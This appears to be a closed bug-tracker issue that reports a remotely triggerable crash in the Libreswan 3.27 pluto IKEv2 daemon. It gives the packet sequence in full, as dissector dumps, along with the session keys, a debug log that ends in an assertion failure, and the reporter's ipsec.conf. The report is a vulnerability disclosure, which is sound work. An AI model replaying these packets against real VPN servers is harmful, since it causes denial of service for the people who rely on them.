Closed
Description
Hello, I triggered a vulnerability while testing the Libreswan 3.27 IKEv2 server.
The pluto IKE daemon will restart (due to NULL pointer dereference when built with NSS) by sending two IKEv2 packets which are init_IKE and delete_IKE in 3des_cbc mode to Libreswan server.
A detailed interactive process is as follows:
First, send the first init_IKE message to the server.
The server replies the init_IKE message to the client.
Then send a delete_IKE message (encrypted) to the server.
The server tries to respond INVALID_IKE_SPI to the client, but an exception occurred while preparing to encrypt the message.
#### detailed packets
# The first packet(I: init_IKE)
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 416
id = 1
flags =
frag = 0
ttl = 64
proto = udp
chksum = 0xa778
src = 192.168.40.1
dst = 192.168.40.130
\options \
###[ UDP ]###
sport = isakmp
dport = isakmp
len = 396
chksum = 0x3708
###[ IKEv2 ]###
init_SPI = '4\xba;\xf6\xd8\x8c\x17\xef'
resp_SPI = ''
next_payload= SA
version = 0x20
exch_type = IKE_SA_INIT
flags = Initiator
id = 0
length = 388
###[ IKEv2 SA ]###
next_payload= KE
res = 0
length = 44
\prop \
|###[ IKEv2 Proposal ]###
| next_payload= last
| res = 0
| length = 40
| proposal = 1
| proto = IKEv2
| SPIsize = 0
| trans_nb = 4
| SPI = ''
| \trans \
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Encryption
| | res2 = 0
| | transform_id= 3DES
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Integrity
| | res2 = 0
| | transform_id= HMAC-SHA1-96
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= PRF
| | res2 = 0
| | transform_id= PRF_HMAC_SHA1
| |###[ IKE Transform ]###
| | next_payload= last
| | res = 0
| | length = 8
| | transform_type= GroupDesc
| | res2 = 0
| | transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]###
next_payload= Nonce
res = 0
length = 136
group = 1024MODPgr
res2 = 0
load = '(\xe9\xaa\xaa\x91\xf1\x1d)\xd9\x1c\x9c\xeb\xcab\x90\xd8\x8fZ\x19\xad\x15\x80\xfe\x16\xde\x06j\x93\t\x92\xcay\x0f^}\x16\x11\xdc\xab\xd3\x0f\xf6ciA\xfe\t\x8del\xd4D\x04\x00\x87v\\Q\xa7\x83t\xc4u\x18\xe6\xb1\xdcV\xbb\x00u}?\x8dz\x90\xef\xe9gb\xf3uJr\x8ed\xae\xcf:\x85\xe5\xdf\xda\xdc1\xc3\x95K\x8e\x82\x84\x96\x0b\xea_N\xe5\x8bB\xdf\x9c\\\xa4\x1a\xbd\xf4B\x07\x1a\x0c\xfd)\xb9.4y\x1d\xa1'
###[ IKEv2 Nonce ]###
next_payload= Notify
res = 0
length = 36
load = '\x9al/\xbe\x01\x1f\xdc\xdc\x8b\xa4O\xd7k\xdf\x96^9\xcbmx\xcf\xe8\xc4\xa4$x\x8a\r\xbb%\xa6\xb2'
###[ IKEv2 Notify ]###
next_payload= Notify
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_SOURCE_IP
SPI = ''
load = '\x13\xfa\x01\xe7<\xe4\x93T\xb6\xec\x88\x1d\xeaS\x13O\xad2\x86 '
###[ IKEv2 Notify ]###
next_payload= VendorID
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_DESTINATION_IP
SPI = ''
load = '\xde\xb7\xf8\x91\xddX(\xe6\x89\xc3\xc1l\xae\x9a\x07\xb8o\xb4\x13\xc3'
###[ IKEv2 Vendor ID ]###
next_payload= VendorID
res = 0
length = 24
vendorID = '\x1e+Qi\x05\x99\x1c}|\x96\xfc\xbf\xb5\x87\xe4a\x00\x00\x00\t'
###[ IKEv2 Vendor ID ]###
next_payload= VendorID
res = 0
length = 20
vendorID = '\xfb\x1d\xe3\xcd\xf3A\xb7\xea\x16\xb7\xe5\xbe\x08U\xf1 '
###[ IKEv2 Vendor ID ]###
next_payload= VendorID
res = 0
length = 20
vendorID = '&$M8\xed\xdba\xb3\x17*6\xe3\xd0\xcf\xb8\x19'
###[ IKEv2 Vendor ID ]###
next_payload= None
res = 0
length = 24
vendorID = '\x01R\x8b\xbb\xc0\x06\x96\x12\x18I\xab\x9a\x1c[*Q\x00\x00\x00\x02'
# The second packet(R: init_IKE)
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 361
id = 31815
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xeb68
src = 192.168.40.130
dst = 192.168.40.1
\options \
###[ UDP ]###
sport = isakmp
dport = isakmp
len = 341
chksum = 0xd236
###[ IKEv2 ]###
init_SPI = '4\xba;\xf6\xd8\x8c\x17\xef'
resp_SPI = '\xc6\xe1\x11i\x1d^\x18D'
next_payload= SA
version = 0x20
exch_type = IKE_SA_INIT
flags = Response
id = 0
length = 333
###[ IKEv2 SA ]###
next_payload= KE
res = 0
length = 44
\prop \
|###[ IKEv2 Proposal ]###
| next_payload= last
| res = 0
| length = 40
| proposal = 1
| proto = IKEv2
| SPIsize = 0
| trans_nb = 4
| SPI = ''
| \trans \
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Encryption
| | res2 = 0
| | transform_id= 3DES
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= PRF
| | res2 = 0
| | transform_id= PRF_HMAC_SHA1
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Integrity
| | res2 = 0
| | transform_id= HMAC-SHA1-96
| |###[ IKE Transform ]###
| | next_payload= last
| | res = 0
| | length = 8
| | transform_type= GroupDesc
| | res2 = 0
| | transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]###
next_payload= Nonce
res = 0
length = 136
group = 1024MODPgr
res2 = 0
load = '\x7f\x9b\x1aHlx\xdd\x86\xaa\xcf\x8e\xcd\x14\x9dU\x1e\x9c\x96\x99\xe6\x16\xc6\xce\xc8.&\xe5\x0e\x16\x8cfr\xfc\x8c\xc60\x83k\x8dF\x1a\xd5s\x8a^\xa5\x85\xcd\x86-\xde\x97\x98\xedc\x17\xb8\xf84!\x15\xf0\x11(D?\xd9\xa3\xc2\x80\xd6\xd6\x92R\xe2\t\xcb\xa2D{\x13g\xb7\x99\xa4\xa7\xd4\x8b\x0c\xf7\xb8\xbd\xa0]\x87\xd0\xa1\xa6~Nf\x9d\x98\x9f\x89\x94\xe5V\xed%\x0f&\x8cT\xe6\xa0\x05Uuyk\xe1w\xd82]A\xfa'
###[ IKEv2 Nonce ]###
next_payload= Notify
res = 0
length = 36
load = '\xe9\xc3c\x8a\xa7\xa9_\x8d\xf3\x15\xbc7\xaa\xd8\x8b\xd4\x93\x16\xb7\x10\xe0w\xc0\x10IY\xc1s\xf2<+k'
###[ IKEv2 Notify ]###
next_payload= Notify
res = 0
length = 8
proto = Reserved
SPIsize = 0
type = IKEV2_FRAGMENTATION_SUPPORTED
SPI = ''
load = ''
###[ IKEv2 Notify ]###
next_payload= Notify
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_SOURCE_IP
SPI = ''
load = 's\x9a\xd1\xecQ\xc4L\xdfy^\xa5\xb9\x9b\xa4\r\xde\x0c\x13;\xdc'
###[ IKEv2 Notify ]###
next_payload= CERTREQ
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_DESTINATION_IP
SPI = ''
load = "\x91\n%J\x85\xb0\xec\xads\xf42\x8b1\x98\x7f\xff'\xcb\xa6\xfe"
###[ IKEv2 Payload ]###
next_payload= None
flags =
length = 25
load = '\x04\xa40\xb5\xee\xedr\x07\xa7\xbf\xe1L<]\x95\x19\xde\xeeys\xd9'
# The third packet(I: delete_IKE)
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 100
id = 1
flags =
frag = 0
ttl = 64
proto = udp
chksum = 0xa8b4
src = 192.168.40.1
dst = 192.168.40.130
\options \
###[ UDP ]###
sport = 4500
dport = 4500
len = 80
chksum = 0xafe4
data = 0x00000000
###[ IKEv2 ]###
init_SPI = '4\xba;\xf6\xd8\x8c\x17\xef'
resp_SPI = '\xc6\xe1\x11i\x1d^\x18D'
next_payload= Encrypted
version = 0x20
exch_type = INFORMATIONAL
flags = Initiator
id = 1
length = 68
###[ IKEv2 Encrypted and Authenticated ]###
next_payload= Delete
res = 0
length = 40
load = '=!\x87\x9c@\x0eX\xe5\xa1\xdf\xc6\xc9\xa2&\xf8\xf5\xc7\x0fSu\xd7\xa0\xdf\xc4nZ\x1a\x99U\x02Y_\xad\xc5UA'
# *************** #
# Decrypted message
###[ IKEv2 Delete ]###
next_payload= None
res = 0
length = 8
vendorID = '\x01\x00\x00\x00'
# *************** #
# relecant parameters
spi_i
0x34\0xba\0x3b\0xf6\0xd8\0x8c\0x17\0xef
spi_r
0xc6\0xe1\0x11\0x69\0x1d\0x5e\0x18\0x44
sk_ai
0xa7\0xcb\0x4f\0x50\0xe9\0xb5\0x61\0x8f\0x04\0xc4\0xaa\0x0f\0x58\0x93\0x98\0xd3\0xfd\0xb6\0xdb\0xdb
sk_ar
0x89\0x2c\0xd0\0x3a\0x4e\0xb1\0xeb\0x19\0xf7\0x04\0xc1\0xc1\0x6f\0x64\0x08\0x5d\0x4b\0xef\0x8d\0x34
sk_ei
0xe9\0x4a\0x94\0x4d\0x2e\0xfb\0x8b\0x8e\0x86\0xb9\0xd6\0x18\0xfb\0xcd\0x53\0xdd\0xd8\0x35\0x60\0xba\0xc8\0xbb\0x71\0x46
sk_er
0x7a\0x4d\0x3d\0xb3\0x4d\0x72\0x7e\0x25\0xa4\0xc5\0x4a\0xb1\0x93\0x9d\0x9f\0x51\0x17\0x44\0x86\0x3e\0x51\0xe0\0x39\0x22
Relevant log
May 7 16:32:32.868480: | state #1 requesting EVENT_CRYPTO_TIMEOUT to be deleted
May 7 16:32:32.868496: | free_event_entry: release EVENT_CRYPTO_TIMEOUT-pe@0x55f4dc4630f8
May 7 16:32:32.868501: | event_schedule: new EVENT_v2_RESPONDER_TIMEOUT-pe@0x55f4dc4630f8
May 7 16:32:32.868506: | inserting event EVENT_v2_RESPONDER_TIMEOUT, timeout in 200.000 seconds for #1
May 7 16:32:32.868515: | processing: stop state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in schedule_event_now_cb() at server.c:561)
May 7 16:32:32.868519: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May 7 16:32:32.868522: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May 7 16:32:32.883707: | *received 68 bytes from 192.168.40.1:4500 on ens33 (port=4500)
May 7 16:32:32.883740: | 34 ba 3b f6 d8 8c 17 ef c6 e1 11 69 1d 5e 18 44
May 7 16:32:32.883743: | 2e 20 25 08 00 00 00 01 00 00 00 44 2a 00 00 28
May 7 16:32:32.883745: | 3d 21 87 9c 40 0e 58 e5 a1 df c6 c9 a2 26 f8 f5
May 7 16:32:32.883766: | c7 0f 53 75 d7 a0 df c4 6e 5a 1a 99 55 02 59 5f
May 7 16:32:32.883769: | ad c5 55 41
May 7 16:32:32.883773: | processing: start from 192.168.40.1:4500 (in process_md() at demux.c:391)
May 7 16:32:32.883778: | **parse ISAKMP Message:
May 7 16:32:32.883780: | initiator cookie:
May 7 16:32:32.883782: | 34 ba 3b f6 d8 8c 17 ef
May 7 16:32:32.883785: | responder cookie:
May 7 16:32:32.883786: | c6 e1 11 69 1d 5e 18 44
May 7 16:32:32.883789: | next payload type: ISAKMP_NEXT_v2SK (0x2e)
May 7 16:32:32.883792: | ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May 7 16:32:32.883794: | exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May 7 16:32:32.883796: | flags: ISAKMP_FLAG_v2_IKE_INIT (0x8)
May 7 16:32:32.883799: | message ID: 00 00 00 01
May 7 16:32:32.883801: | length: 68 (0x44)
May 7 16:32:32.883804: | processing version=2.0 packet with exchange type=ISAKMP_v2_INFORMATIONAL (37)
May 7 16:32:32.883806: | I am receiving an IKEv2 Request ISAKMP_v2_INFORMATIONAL
May 7 16:32:32.883808: | I am the IKE SA Original Responder
May 7 16:32:32.883814: | cookies table: hash icookie 34 ba 3b f6 d8 8c 17 ef rcookie c6 e1 11 69 1d 5e 18 44 to 3873113480610546027 slot 0x55f4db2f6b40
May 7 16:32:32.883817: | parent v2 peer and cookies match on #1
May 7 16:32:32.883820: | v2 state object #1 found, in STATE_PARENT_R1
May 7 16:32:32.883825: | processing: start state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in processed_retransmit() at ikev2.c:1182)
May 7 16:32:32.883827: | found state #1
May 7 16:32:32.883831: | processing: [RE]START state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in ikev2_process_packet() at ikev2.c:1552)
May 7 16:32:32.883834: | processing: start connection "ikev2-cp"[1] 192.168.40.1 (BACKGROUND) (in ikev2_process_packet() at ikev2.c:1557)
May 7 16:32:32.883837: | #1 is idle
May 7 16:32:32.883839: | #1 idle
May 7 16:32:32.883841: | #1 in state PARENT_R1: received v2I1, sent v2R1
May 7 16:32:32.883844: | selected state microcode roof
May 7 16:32:32.883846: | no useful state microcode entry found
May 7 16:32:32.883850: "ikev2-cp"[1] 192.168.40.1 #1: responding to INFORMATIONAL message (ID 1) from 192.168.40.1:500 with encrypted notification INVALID_IKE_SPI
May 7 16:32:32.883853: | Opening output PBS encrypted notification
May 7 16:32:32.883856: | **emit ISAKMP Message:
May 7 16:32:32.883858: | initiator cookie:
May 7 16:32:32.883860: | 34 ba 3b f6 d8 8c 17 ef
May 7 16:32:32.883862: | responder cookie:
May 7 16:32:32.883864: | c6 e1 11 69 1d 5e 18 44
May 7 16:32:32.883866: | next payload type: ISAKMP_NEXT_NONE (0x0)
May 7 16:32:32.883869: | ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May 7 16:32:32.883871: | exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May 7 16:32:32.883873: | flags: ISAKMP_FLAG_v2_MSG_RESPONSE (0x20)
May 7 16:32:32.883875: | message ID: 00 00 00 01
May 7 16:32:32.883878: | next payload type: saving message location 'ISAKMP Message'.'next payload type'
May 7 16:32:32.883881: | next payload type: setting 'ISAKMP Message'.'next payload type' to IKEv2 Encryption Payload (46:ISAKMP_NEXT_v2SK)
May 7 16:32:32.883884: | ***emit IKEv2 Encryption Payload:
May 7 16:32:32.883886: | next payload type: ISAKMP_NEXT_v2NONE (0x0)
May 7 16:32:32.883888: | flags: none (0x0)
May 7 16:32:32.883890: | next payload type: saving message location 'IKEv2 Encryption Payload'.'next payload type'
May 7 16:32:32.883901: | emitting 8 raw bytes of IV into IKEv2 Encryption Payload
May 7 16:32:32.883904: | IV d1 f5 3d d9 f2 04 95 d2
May 7 16:32:32.883906: | Adding a v2N Payload
May 7 16:32:32.883909: | next payload type: setting 'IKEv2 Encryption Payload'.'next payload type' to IKEv2 Notify Payload (41:ISAKMP_NEXT_v2N)
May 7 16:32:32.883911: | ****emit IKEv2 Notify Payload:
May 7 16:32:32.883913: | next payload type: ISAKMP_NEXT_v2NONE (0x0)
May 7 16:32:32.883915: | flags: none (0x0)
May 7 16:32:32.883918: | Protocol ID: PROTO_v2_RESERVED (0x0)
May 7 16:32:32.883926: | SPI size: 0 (0x0)
May 7 16:32:32.883929: | Notify Message Type: v2N_INVALID_IKE_SPI (0x4)
May 7 16:32:32.883931: | next payload type: saving payload location 'IKEv2 Notify Payload'.'next payload type'
May 7 16:32:32.883944: | emitting length of IKEv2 Notify Payload: 8
May 7 16:32:32.883947: | adding 8 bytes of padding (including 1 byte padding-length)
May 7 16:32:32.883949: | emitting 8 raw bytes of padding and length into IKEv2 Encryption Payload
May 7 16:32:32.883952: | padding and length 00 01 02 03 04 05 06 07
May 7 16:32:32.883955: | emitting 12 zero bytes of length of truncated HMAC/KEY into IKEv2 Encryption Payload
May 7 16:32:32.883966: | emitting length of IKEv2 Encryption Payload: 40
May 7 16:32:32.883969: | emitting length of ISAKMP Message: 68
May 7 16:32:32.883972: | construct_enc_iv: encryption IV/starting-variable: salt-size=0 wire-IV-size=8 block-size 8
May 7 16:32:32.883974: | construct_enc_iv: encryption IV/starting-variable: computed counter-size=0
May 7 16:32:32.883976: | encryption IV/starting-variable
May 7 16:32:32.883978: | d1 f5 3d d9 f2 04 95 d2
May 7 16:32:32.883980: | data before encryption:
May 7 16:32:32.883982: | 00 00 00 08 00 00 00 04 00 01 02 03 04 05 06 07
May 7 16:32:32.883985: | NSS ike_alg_nss_cbc: 3des_cbc - enter
May 7 16:32:32.883988: "ikev2-cp"[1] 192.168.40.1 #1: ABORT: ASSERTION FAILED: 3des_cbc - NSS derived enc key in NULL (in ike_alg_nss_cbc() at ike_alg_encrypt_nss_cbc_ops.c:41)
My ipsec.conf
version 2.0
config setup
virtual-private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12,%v4:!192.168.42.0/24,%v4:!192.168.43.0/24
protostack=netkey
interfaces=%defaultroute
uniqueids=no
plutodebug="all crypt"
plutostderrlog=/var/log/libreswan.log
conn ikev2-cp
left=%defaultroute
leftcert=192.168.40.130
leftid=@192.168.40.130
leftsendcert=always
leftsubnet=0.0.0.0/0
leftrsasigkey=%cert
right=%any
rightid=%fromcert
# rightaddresspool=192.168.43.10-192.168.43.250
rightaddresspool=10.31.2.0-10.31.3.254
rightca=%same
rightrsasigkey=%cert
narrowing=yes
dpddelay=30
dpdtimeout=120
dpdaction=clear
auto=add
ikev2=insist
rekey=yes
pfs=no
ike-frag=yes
ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
phase2alg=3des-sha1;modp1024,aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2
modecfgdns="8.8.8.8 8.8.4.4"
encapsulation=yes
mobike=no
conn shared
left=%defaultroute
leftid=218.28.144.36
right=%any
encapsulation=yes
authby=secret
pfs=no
rekey=no
keyingtries=5
dpddelay=30
dpdtimeout=120
dpdaction=clear
ike=aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes256-sha2_512,aes128-sha2,aes256-sha2
sha2-truncbug=yes
conn l2tp-psk
auto=add
leftprotoport=17/1701
rightprotoport=17/%any
type=transport
phase2=esp
also=shared
conn xauth-psk
auto=add
leftsubnet=0.0.0.0/0
rightaddresspool=192.168.43.10-192.168.43.250
modecfgdns="8.8.8.8 8.8.4.4"
leftxauthserver=yes
rightxauthclient=yes
leftmodecfgserver=yes
rightmodecfgclient=yes
modecfgpull=yes
xauthby=file
ike-frag=yes
ikev2=never
cisco-unity=yes
also=shared
ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2
Looking forward to your reply, thank you.
Metadata
Metadata
Assignees
Labels
No labels